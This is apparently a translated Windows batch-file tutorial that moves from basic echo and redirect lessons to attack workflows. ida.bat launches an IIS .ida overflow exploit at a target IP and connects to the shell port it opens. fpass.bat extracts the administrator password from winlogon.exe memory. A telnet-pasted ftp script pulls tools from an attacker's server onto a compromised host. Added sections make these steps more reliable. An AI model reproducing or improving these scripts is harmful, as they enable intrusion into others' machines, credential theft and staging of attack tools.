######################################################################
4. Simple batch file concept
######################################################################
echo This is test >
type
echo This is test 11111 >>
type
echo This is test 22222 >
type
The second echo appends to the file (>>), so the file then holds both lines.
The third echo (>) truncates the file and recreates it with only that one line.
netstat -n | find "3389"
This lists every active connection whose line contains 3389, i.e. Terminal Services sessions on that port. Because find does a plain substring match it also picks up unrelated lines, such as a client on ephemeral port 13389; use find ":3389 " (leading colon, trailing space) to match only the port field of netstat's output.
________________test.bat___________________________________________________
@rem Run with echo left on: a line without a leading @ is shown twice, first the command itself and then its output
@echo please care
echo please care 1111
echo please care 2222
echo please care 3333
@rem With a leading @ only the output is shown
@echo please care
@echo please care 1111
@echo please care 2222
@echo please care 3333
rem rem lines are comments and print nothing themselves, but without @ this line is still echoed as a command and shows
@rem With @ in front, this comment line does not show at all
@if exist %windir%\system32\ (echo Found !!!) else (echo ERROR: Not found )
___________________________________________________________________________
Let's take a specific program as the example: the ida remote overflow (it targets port 80; the page calls the exploit program iidahack). It should be very simple.
___________________ida.bat_________________________________________________
@rem ver 1.0
@rem Check that the helper programs are present (their file names are omitted on the page)
@if NOT exist %windir%\system32\ echo "ERROR: not found "
@if NOT exist %windir%\system32\ echo "ERROR: not found "
@rem %1 = target IP (required), %2 = target type (optional, defaults to 1 below)
@if "%1"=="" goto USAGE
@if NOT "%2"=="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
@rem Exploit program name omitted on the page; its arguments are the target, port 80, type 1 and 99, the port connected to further down
%1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] "
@type %temp%\_tmp
@rem find returns 0 when the string is present and 1 when it is absent
@find "good luck" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [good luck]"
@rem "if NOT errorlevel 1" is true only when the exit code is 0, i.e. find saw "good luck"; then connect to port 99 (connect tool name omitted on the page)
@if NOT errorlevel 1 %1 99
@goto END
:SP2
@rem Same as above, with the caller's target type from %2
@ %1 80 %2 99 >%temp%\_tmp
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@if NOT errorlevel 1 %1 99
@goto END
:USAGE
@echo Example: IP
@echo Example: IP (2,3)
:END
_____________________ida.bat__END_________________________________
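The pattern behind ida.bat, as an added example that is not from the original page: check the arguments and a required helper, run a tool with its output captured to a file, search that output for a success marker with find, and branch on the exit code. ping stands in for the exploit program and "TTL=" for "good luck"; the output file name, the marker and the 1-second timeout are this example's own assumptions.

```batch
@echo off
setlocal
rem Added example (not from the original page): the ida.bat pattern with
rem ping standing in for the exploit and "TTL=" for the "good luck" marker.
rem Output file name, marker and timeout are this example's own choices.

set OUTFILE=%temp%\_probe.txt
if "%1"=="" goto USAGE

rem 1. Stop if a required helper is missing (ida.bat only prints a message
rem    and carries on; stopping is the safer choice).
if not exist %windir%\system32\find.exe (
    echo ERROR: find.exe not found
    goto END
)

rem 2. Run the tool and capture its output. Keep a space before the
rem    redirect arrow: cmd reads a digit that touches the arrow as a
rem    file-handle number, so writing 99 hard against it sends handle 9
rem    to the file and the tool receives only 9 as its last argument.
ping -n 1 -w 1000 %1 > "%OUTFILE%"
echo tool exit code [%errorlevel%]

rem 3. Search the output for the marker. The tool's own exit code may not
rem    tell you what happened (ping can return 0 for "Destination host
rem    unreachable" replies), but find does: 0 = found, 1 = absent, 2 = error.
find "TTL=" "%OUTFILE%" > nul
echo find exit code [%errorlevel%]

rem 4. "if errorlevel 1" is true for ANY value of 1 or more, so it lumps
rem    "absent" together with "error". Compare the exact value instead.
if %errorlevel% EQU 0 goto FOUND
if %errorlevel% EQU 1 goto NOTFOUND
echo ERROR: find failed with exit code %errorlevel%
goto END

:FOUND
echo %1 answered: marker present, carry on
rem This is the point where ida.bat connects to the port the exploit opened.
goto END

:NOTFOUND
echo %1 did not answer: marker absent, stopping
goto END

:USAGE
echo Usage: %~nx0 host
:END
if exist "%OUTFILE%" del "%OUTFILE%"
endlocal
```

Run it as probe.bat 127.0.0.1 to see the FOUND branch and with an unused address to see NOTFOUND; deleting the capture file at :END keeps tool output from piling up in %temp%, which the original scripts never clean up.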
The second file below is for getting the administrator password.
Most people say it cannot be obtained; in fact, they simply do not pass the right arguments (the domain name, the user name and the PID of winlogon.exe that the usage line asks for).
___________________________fpass.bat____________________________________________
@rem ver 1.0
@rem Check that the helper programs are present (their file names are omitted on the page)
@if NOT exist %windir%\system32\ echo "ERROR: not found "
@if NOT exist %windir%\system32\ echo "ERROR: not found "
@echo start....
@echo ____________________________________
@rem %1 = domain name, %2 = user name, %3 = PID of winlogon.exe; with no arguments, show how to find the PID
@if "%1"=="" goto USAGE
@rem Password tool name omitted on the page; its output is appended to the log file
@ %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] "
@type %temp%\_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@rem Record the host's network configuration in the same log file
@ipconfig /all >>%temp%\_findpass.txt
@goto END
:USAGE
@rem Process-lister name omitted on the page: it writes the process list to _pass.txt
@ >%temp%\_pass.txt
@rem Filter name omitted on the page: it searches the listing (case-insensitive) for WINLOGON, explorer and internat so the winlogon PID can be read off
@ /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: %1 %2 %3 %4 !!!"
@echo "Usage: DomainName UserName PID-of-WinLogon"
:END
@echo " %COMPUTERNAME% %USERNAME% administrator "
@echo " end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________
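Getting the winlogon.exe PID that fpass.bat's usage line asks for, as an added example not from the original page. It assumes tasklist, which exists on Windows XP and later (the page's Windows 2000 era needed a separate process-listing tool), and uses a for /f loop to read the PID column; the password tool itself is not named on the page, so the script ends by printing the three arguments it would be given.

```batch
@echo off
setlocal
rem Added example (not from the original page): find the winlogon.exe PID
rem that fpass.bat expects on its command line. Assumes tasklist (Windows
rem XP and later); the page's Windows 2000 era used a separate lister.

set WLPID=
rem /nh drops the header; tokens=1,2 pick the image name and PID columns.
rem The name is re-checked because tasklist prints an "INFO: No tasks..."
rem line instead of nothing when the filter matches no process.
for /f "tokens=1,2" %%i in ('tasklist /fi "imagename eq winlogon.exe" /nh') do (
    if /i "%%i"=="winlogon.exe" if not defined WLPID set WLPID=%%j
)

if not defined WLPID (
    echo ERROR: winlogon.exe not found in the process list
    goto END
)

rem These are the three values fpass.bat's usage line asks for, in order.
echo DomainName=%USERDOMAIN% UserName=%USERNAME% PID-of-WinLogon=%WLPID%
:END
endlocal
```

On systems with several logon sessions there is one winlogon.exe per session; the "if not defined" guard keeps the first PID listed, so check which session you want before handing it on.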
Another case: you have a telnet session on a remote (Windows) host and want to upload files to it.
Enter the following lines in the telnet window one after another (or paste them all at once with Ctrl+V), then wait!! They write an ftp script to the file w and run it: the first line opens your FTP server (here on port 3396), the next two lines answer the user-name and password prompts, and the get lines fetch the files. Note the space before >w on the first line: cmd treats a digit immediately before > as a file-handle number, so 3396>w would redirect handle 6 and the open command would never reach w.
echo open 210..4 3396 >w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get >>w
echo get >>w
echo get >>w
echo quit >>w
ftp -s:w
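The same upload as a batch file, added here and not part of the original page. It builds the ftp script with a space before every redirect, logs in with an explicit user line (under -n, so no prompt is ever waited on), shows the script before running it, and checks that the file exists afterwards, since ftp.exe's exit code does not reflect whether the transfer succeeded. The server 10.0.0.5, port 2121, the read/read account and the file name tool.exe are placeholders, not values from the page. Note also that cd in an ftp script changes the directory on the server; lcd changes the local one.

```batch
@echo off
setlocal
rem Added example (not from the original page): write an ftp script, run it
rem without prompting, then check that the file really arrived. The server
rem 10.0.0.5, port 2121, the read/read account and tool.exe are placeholders.

set SCRIPT=w.txt
set SRV=10.0.0.5
set PORT=2121
set FILE=tool.exe

rem A space before each redirect arrow matters: with the port written hard
rem against the arrow, cmd takes its last digit as a file-handle number and
rem that digit never reaches the script.
echo open %SRV% %PORT% > %SCRIPT%
rem -n below turns auto-login off, so log in explicitly instead of relying
rem on two bare lines being read as user name and password at the prompts.
echo user read read >> %SCRIPT%
echo binary >> %SCRIPT%
rem The file lands in the current directory; use lcd in the script to
rem change that, not cd, which changes the directory on the server.
echo get %FILE% >> %SCRIPT%
echo quit >> %SCRIPT%

rem Show what is about to run; over a telnet session this is the only
rem feedback you get before the transfer.
type %SCRIPT%
ftp -n -s:%SCRIPT%

rem ftp.exe's exit code says nothing about the transfer, so check the result.
if exist %FILE% (
    echo upload OK: %CD%\%FILE%
) else (
    echo upload FAILED: %FILE% not present in %CD%
)
del %SCRIPT%
endlocal
```

Running it from the telnet session leaves w.txt only for the duration of the transfer; the del at the end removes it, which the interactive version on the page never does.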